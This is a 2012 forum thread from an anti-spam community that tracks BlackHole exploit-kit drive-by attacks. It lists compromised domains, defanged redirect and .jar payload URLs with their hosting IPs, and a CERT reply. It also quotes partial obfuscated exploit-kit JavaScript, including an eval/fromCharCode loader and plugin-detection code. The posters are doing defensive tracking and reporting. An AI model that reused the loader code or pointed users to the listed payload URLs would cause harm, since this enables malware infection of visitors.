Numerous malware drive by attempts

A place to discuss malware of every flavor, e.g. Storm, Waledac, Conficker and Zeus

Re: Numerous malware drive by attempts

Postby Red Dwarf » Mon Jun 18, 2012 9:05 pm

More of the same [80]
Code: Select all
ftp.psimpresores.com.ar
a1caravanning.co.uk
amf.dreamhosters.com
camper.waw.pl
cd8.com.cn
cphinney.liquidarchaeology.com
en.highsure.com.cn
en.pymed.com.cn
forum.patriaefidelis.pl
gliiaci.altervista.org
itlb.com.cn
lauriethelibrarian.electrified.ca
library.fandomcafe.com
pics.pixelarium.ch
protonx.pr.funpic.de
sacidaker.com.tr
schalkewiki.sc.funpic.de
serwis.vline.pl
sprockanastacia.altervista.org
test.vesterberg.org
tmvision.com.ar
us.com.sa
web3b.sakura.ne.jp
www.abepsi.org.br
www.albanoguattiphotography.com
www.androsoftitalia.altervista.org
www.beckerundkries.de
www.bhc.co.rs
www.biathlonnachwuchs.de
www.bleugarance.fr
www.bluesclub.pl
www.bunnyschool.co.rs
www.cidademanaus.com.br
www.constructoradelbosque.com
www.cqnasx.com
www.davidcantero.fr
www.deq.state.ms.us
www.donnepercambiare.altervista.org
www.engineerable.com
www.everline.ru
www.goodway.sh.cn
www.goushoubiao.com
www.gztwzl.com
www.helpincleaning.co.uk
www.hostelnewmorning.com
www.houseoflordsla.com
www.huguet.cl
www.infrontofmycamera.com
www.jysj.net.cn
www.lipe.rs
www.lizzieannbags.co.uk
www.lyhyjt.cn
www.nordcapitalgroup.ru
www.paree.cn
www.planetearthstaffing.com
www.plusbeograd.com
www.puteviinvest.rs
www.qchzd.com
www.shdexi.com
www.shidokai.co.uk
www.sit.gov.cv
www.skagen.bz
www.stlukesforesthills.org
www.storgas.co.rs
www.sztrm.co.rs
www.therapy2000.com
www.therealmantracker.com
www.timobieber.de
www.ubefekt.pl
www.voodoolab.org
www.walkislesofscilly.co.uk
www.wdjly.com
www.webclinic.ro
www.webuymaternity.com
www.wizantiana.co.rs
www.writersinc.co
www.xialy.com
www.xiaofeima.com
www.yemio.co.uk
www.zjsfz.com
www.zkkrosno.vel.pl


Malicious Redirections de-obfuscated: monashkanasene.ru
Code: Select all
    hxxp://monashkanasene.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c
    hxxp://monashkanasene.ru:8080/forum/Half.jar


Analysis of threats:
Wepawet analysis

Hosting IPs
monashkanasene.ru has address 213.17.171.186
monashkanasene.ru has address 89.111.177.151
monashkanasene.ru has address 94.20.30.91
monashkanasene.ru has address 173.224.209.130
monashkanasene.ru has address 124.124.212.172

Name server hosting IPs
ns1.monashkanasene.ru. 62.76.188.120
ns2.monashkanasene.ru. 62.213.64.161
ns3.monashkanasene.ru. 41.66.137.155
ns4.monashkanasene.ru. 184.106.189.124
ns5.monashkanasene.ru. 50.57.43.49
ns6.monashkanasene.ru. 173.203.96.79

Status
REGISTERED, DELEGATED, UNVERIFIED
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby Red Dwarf » Mon Jun 18, 2012 11:29 pm



CERT-GIB wrote:CERT-GIB Incident Response Team response@cert-gib.ru

12:26 AM (14 hours ago)

to me
Good day.

We have notified the registrar and waiting for response.

--
Best regards,
Gonebnyy Albert
CERT-GIB
+7 (495) 988-00-40
response@cert-gib.ru
http://www.cert-gib.ru/

--

SUMATRANAJUGE.RU
REGISTERED, NOT DELEGATED, UNVERIFIED
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Fri Sep 14, 2012 10:37 pm

Red Dwarf wrote:Live site payload:
Code: Select all
<h1><b>Please Wait... Loading...</h1></b>

<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";
e=window["eval"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,
[~ snip ~]


The exploit(s) which I've been following has adopted a new edition of the BlackHole exploit kit, according to Steven Burn (his remark on a WOT forum). The encrypted data that JavaScript uses to render a "payload" site's webpage on the fly has been moved from the script's text into a PRE tag, but the result is familiar

Code: Select all
try{var PluginDetect={version:"0.7.8",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;ag(b[a],10)){return 1}if(g(c[a],10)c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(c){if(!a.isIE&&c){var f,e,b,d=a.isArray(c)?c:(a.isString(c)?[c]:[]);for(b=0;b2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(a){var f=null,d,b=this,c={};try{f=new b.AXO(a)}catch(d){}return f},convertFuncs:function(f){var a,g,d,b=/^[\$][\$]/,c=this;for(a in f){if(b.test(a)){try{g=a.slice(2);if(g.length>0&&!f[g]){f[g]=f[a](f);delete f[a]}}catch(d){}}}},initObj:function(e,b,d){var a,c;if(e){if(e[b[0]]==1||d){for(a=0;a=0;f=f-2){if(d[f]&&new RegExp(d[f],"i").test(b)){c.OS=d[f+1];break}}}c.convertFuncs(c);c.head=(document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]||document.body||null);c.isIE=(new Function("return "+e+"*@cc_on!@*"+e+"false"))();c.verIE=c.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(i)?parseFloat(RegExp.$1,10):null;c.ActiveXEnabled=false;if(c.isIE){var f,j=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.Dictionary","wmplayer.ocx"];for(f=0;f0&&c.isFunc(b[0])))){a.push(b)}},
[~ snip ~]

The payload sites that I've noticed over the past several months use IP addresses in lieu of domain names and are mostly hosted in the USA. Several new payload sites are sometimes introduced within the same day. The sites' webserver claims to be "nginx/0.7.67" and will reply with bogus HTTP errors to requests from many IP addresses known to be used by virus-hunters, probably including Wepawet and urlQuery. In addition to the rather dated collection of malware, the kit recently added a new exploit for a Java vulnerability (CVE-2012-4681) which may not yet be patched on many computers.
NotBuyingIt
Spammer Killing Machine
 
Posts: 609
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby spamislame » Mon Sep 17, 2012 9:46 am

You should be aware that these are 99.999% of the time hijacked, abandoned websites. They aren't owned or registered by any of the scumbags who set these attacks up.

Per day, at least 800 - 900 new domains are taken over to present these malware sites. That's a direct stat from both law enforcement and the ongoing monitoring by several trackers of Zeus-related spam.

I still report any of the domains I see in my inbound spam, but it's like grabbing a cup of water from the ocean.

I think the past three years has seen a huge increase in the abuse of old abandoned web servers, very often hosted by companies who are completely unresponsive to any abuse requests. And it's not just for malware like this. It's anything. Pharmacy spam, porn, you name it.

SiL
User avatar
spamislame
Site Admin
 
Posts: 5056
Joined: Tue May 09, 2006 9:18 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Tue Sep 18, 2012 7:20 am

spamislame wrote:but it's like grabbing a cup of water from the ocean.
Although I should guess that the scale is much closer to grabbing a cup of water from a mellow pond, I appreciate the saliency of your point. :)
NotBuyingIt
Spammer Killing Machine
 
Posts: 609
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby Red Dwarf » Tue Sep 18, 2012 4:44 pm

spamislame wrote:You should be aware that these are 99.999% of the time hijacked, abandoned websites. They aren't owned or registered by any of the scumbags who set these attacks up.
..
I still report any of the domains I see in my inbound spam, but it's like grabbing a cup of water from the ocean.



For the few that are not abandoned, getting the domain black/red-listed in WOT and Site Advisor sure gains their attention and they patch up the security hole, or at least remove the harmful web pages..
For the remaining 99.99% getting the domain black/red-listed in WOT and Site Advisor renders the scam less effective.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Wed Sep 19, 2012 6:15 pm

Red Dwarf wrote:For the remaining 99.99% getting the domain black/red-listed in WOT and Site Advisor renders the scam less effective.

In addition to planting keyloggers and such, I suspect the particular BlackHole exploit which my WOT thread has been following attempts to secretly recruit its victims' computers into a botnet. (The same "kit" is also used by other groups not followed in my thread.) I have read somewhere that the mischief is mostly accomplished within the first few hours after launching the scam webpages. I have also read that the biggest spammers use a botnet of ten thousand or even twenty thousand zombie computers. My intention has been to raise the alarm on WOT a few hours earlier than WOT's automation would add warnings from its trusted sources. (My cup runneth over.)

Until recently, the exploit used old malware, which is widely detected by most antivirus services, to exploit old vulnerabilities for which patches have been available for a year or two. Only the most neglectful, inept and bewildered (NIB) computer users should have risked infection under these circumstances, perhaps people who are the least likely to install WOT. Now, however, a new Java exploit (as previously noted) has been added and the BlackHole exploit kit has been revised to be more elusive in some ways. The pressure to revise may have come from a diminishing number of still uninfected computers operated by those NIB-lets. I've planned to curtail much of my effort at my thread's six months point in a few days. I think that the thread archives enough malicious URLs to illustrate how treacherous that exploit kit has become.
NotBuyingIt
Spammer Killing Machine
 
Posts: 609
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby Red Dwarf » Thu Sep 20, 2012 3:34 pm

Sorry, I have been neglecting those, and WOT in general - too busy doing scam busting.

I posted a fresh 50 from the past week at
http://www.mywot.com/en/forum/21464-qai ... ent-163762

They were all in the form /********/index.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Previous

Return to Malware

Who is online

Users browsing this forum: No registered users and 2 guests

cron